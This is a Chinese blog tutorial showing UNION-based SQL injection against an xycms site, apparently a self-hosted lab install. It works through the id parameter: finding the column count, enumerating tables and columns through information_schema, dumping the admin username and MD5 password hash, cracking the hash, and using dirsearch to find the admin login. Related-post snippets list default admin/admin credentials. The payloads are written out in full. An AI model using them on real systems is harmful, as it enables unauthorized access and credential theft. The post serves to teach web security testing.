xycms登录后台详细教程(php+mysql)

xycms搭建过程省略.....

首页界面

 

在网站查找注入点,也就是可能会和数据库有交互的地方,?id=13可知此处可能与数据库有交互,之后在此处进行测试 

 

测试

1 and 1=1  1 and 1=2 //int型注入

1’ and 1=1#    1’ and 1=2# //char型注入

 

可知为int型注入,char型就不进行测试了

order by 列数 //查看数据的列数,常用二分法

order by 10 //正常显示  order by 11 //不正常显示

所以得知是10列,

id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 //联合查询,后面的数字有跟前上一步结果输入

这时会有数字显示在页面上,这些都是注入点,根据回显情况我们可以让我们想要的数据回显在页面上,

这里我选择数字10这个位置

id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,database() //查看当前数据库为xycms 

 

 and 1=2 union select 1,2,3,4,5,6,7,8,9,table_name from information_schema.tables where table_schema='xycms' //获取表名

 

and 1=2 union select 1,2,3,4,5,6,7,8,9,table_name from information_schema.tables where table_schema='xycms' limit 1,1 //获取第二张表名

一个数据库肯定不止一张表 limit 2,1 //表3  limit 3,1  //表4......以此类推

and 1=2 union select 1,2,3,4,5,6,7,8,9,column_name from information_schema.columns where table_name='common' limit 0,1    //获取表common列名1

同样的不止一张表  limit 1,1 (列2 ).....

 

and 1=2 union select 1,2,3,4,5,6,7,8,9,id from common //获取ID信息

同样不止一个ID,可以加limit

 

通过以上的方法一个一个查询可以找到表为manage_user下有列名为m_name和m_pwd

and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(m_name,'---',m_pwd) from manage_user

//查找用户名和密码(同样也不止一组)

 

admin111---24FBF59E4D9CC107F6CD64838EF63F98

密码是md5加密,在线md5加解密

admin111---qazxsw111

我们已经拿到账号密码,现在就是找后台登录界面

敏感目录扫描工具:dirsearch(百度网盘下载,提取码:bmxx)

环境:python

工具下载完成后,找到目录并在当前目录下打开cmd,

 

python dirsearch.py -u "扫描的url地址" -e *

python dirsearch.py -u "http://www.cjl.xycms.com/" -e *   //扫描敏感目录

 

主要看状态码为200的,状态码200为访问成功,看到一些比较像登录后台系统的文件目录,都尝试访问一下

最后通过system这个目录登录

 

输入刚刚获得的账号密码admin111---qazxsw111,登录成功。 

  • 10
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
首先感谢大家在繁忙中还关注我们产品,这是一款XYCMS中心小学建站系统源码,学校信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理,新闻资讯管理:管理新闻信息内容,管理相关分类,添加或者删除,校园风光信息管理:发布最新校园风光信息;学习资料管理:网站下载资料管理,可添加,修改,删除等相关操作;教师风采管理:管理学校教师的资料信息,可以添加图片,修改,分类管理等相关操作 友情链接管理:可以添加文字连接,可以进行修改和删除等相关操作 网页广告管理:包括一些图片广告管理。生成JS调用,增加了对联广告管理和漂浮广告,可以控制是否显示(关闭),功能非常强大 其他信息管理:查看管理员登录记录,首页视频内容管理,可以进行修改操作 系统信息管理 系统设置:进行系统相关基本信息设置,如网站名称,企业信息等基本信息。可以管理是否关闭网站网站浏览统计(支持外部统计代码)等 LOGO/形象图片管理:首页LOGO管理,可以设置长宽大小 安全管理:看相关违规操作记录,查询攻击IP地址,封闭IP,管理SQL信息 安全设置:根据需要设置一些安全过滤信息 首页菜单管理:可以添加,删除菜单信息,打开窗口,是否显示,是否为头部导航或者底部导航栏 管理员管理:对超级管理员信息管理,可以进行添加,删除,修改等操作 运行环境:ASP+ACCESS 使用方法:本地测试,双击系统自带的测试工具(红色图标)"b"运行即可,空间测试上传upload目录下的所有文件 后台路径:/admin/index.asp 用户名、密码都是:admin XYCMS中心小学建站系统源码 v1.7 更新: 1.更换后台编辑器,解决各大浏览器兼容性问题
后台路径:admin/,用户名、密码:admin 该源码使用用途:爱好者学**或者研究,禁止用作商业建站。 本机测试环境:windowxp/windows7 IIS【必须此环境】 由于测试小工具“aspweb.exe”对utf8编码兼容性差,所以用户不要用此工具测试。 网站运行环境:ASP ACCESS html utf8 优点:UTF8编码国际通用,不会出现乱码现象。 更新记录: 1.更换编辑器,支持加水印 2.加上静态html生成接口 3.修正后台基本信息添加不上BUG 网站功能: 安全性:防SQL注入,自动锁定入侵的IP地址,防XSS攻击,具有很好的过滤系统 功能简述: 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除 产品内容管理:对产品类别进行管理,分为大类和小类,发布最新产品信息 客户案例管理:对客户案例内容进行管理 招聘信息管理:发布一些招聘信息 其他信息管理:查看管理员登录记录,首页视频内容管理,可以进行修改操作 系统设置:进行系统相关基本信息设置,如网站名称,企业信息等基本信息。可以管理是否关闭网站,注册是否审核,留言是否审核 LOGO/形象图片管理:首页LOGO管理 安全管理:看相关违规操作记录,查询攻击IP地址,自动封闭IP,管理SQL信息 安全设置:根据需要设置一些安全过滤信息 首页菜单管理:可以添加,删除菜单信息,打开窗口,是否显示,是否为头部导航或者底部导航栏 管理员管理:对超级管理员信息管理,可以进行添加,删除,修改等操作
XYCMS企业建站系统最新官方版,该源码是网站运行环境:ASP+ACCESS+html+utf8,优点:UTF8编码国际通用,不会出现乱码现象。网站功能:安全性:防SQL注入,自动锁定入侵的IP地址,防XSS攻击,具有很好的过滤系统,喜欢的朋友可以下载研究一下看看。 功能简述: 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除 产品内容管理:对产品类别进行管理,分为大类和小类,发布最新产品信息 客户案例管理:对客户案例内容进行管理 招聘信息管理:发布一些招聘信息 其他信息管理:查看管理员登录记录,首页视频内容管理,可以进行修改操作 系统设置:进行系统相关基本信息设置,如网站名称,企业信息等基本信息。可以管理是否关闭网站,注册是否审核,留言是否审核 LOGO/形象图片管理:首页LOGO管理 安全管理:看相关违规操作记录,查询攻击IP地址,自动封闭IP,管理SQL信息 安全设置:根据需要设置一些安全过滤信息 首页菜单管理:可以添加,删除菜单信息,打开窗口,是否显示,是否为头部导航或者底部导航栏 管理员管理:对超级管理员信息管理,可以进行添加,删除,修改等操作 更新记录: 1.更换编辑器,支持加水印 2.加上静态html生成接口 3.修正后台基本信息添加不上BUG 后台路径:admin/,用户名、密码:admin 该源码使用用途:爱好者学习或者研究,禁止用作商业建站。 本机测试环境:windowxp/windows7+IIS【必须此环境】 由于测试小工具“aspweb.exe”对utf8编码兼容性差,所以用户不要用此工具测试。
xycms留言板存在逻辑缺陷漏洞的原因可能是在处理用户输入时没有进行足够的验证和过滤。这可能导致各种安全问题,例如SQL注入、跨站脚本攻击等。 首先,如果xycms留言板没有对用户输入进行严格过滤和验证,攻击者可能会通过构造恶意的输入,成功执行SQL注入攻击。攻击者可以插入恶意的SQL语句来执行未经授权的操作,如删除或修改数据库中的数据,甚至获取整个数据库的敏感信息。 其次,没有适当的验证和过滤用户输入也会导致跨站脚本攻击的风险。攻击者可以在留言板中插入恶意的脚本代码,并在其他用户浏览时执行这些代码。这可能导致用户的cookie被盗取,或者用户被重定向到恶意网站。 另外,留言板还可能存在未经身份验证的用户访问的问题。如果没有验证用户身份,攻击者可以冒充其他用户,发布虚假或恶意的留言,破坏留言板的秩序或传播虚假信息。 为了解决这些逻辑缺陷漏洞,开发人员应该对用户输入进行严格的验证和过滤,确保输入的安全性。可以使用合适的编码函数或过滤器来确保从用户接收到的数据是安全的,以防止SQL注入或跨站脚本攻击。 此外,开发人员还应该实施身份验证和授权机制,确保只有经过身份验证的用户才能发布留言。这可以通过要求用户登录或使用验证码等方式来实现。 总之,xycms留言板存在逻辑缺陷漏洞,可能导致安全问题和用户身份冒充等风险。开发人员应该采取适当的安全措施来修复这些问题,以确保用户的信息安全和留言板的正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽小学二年级

你的鼓励是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值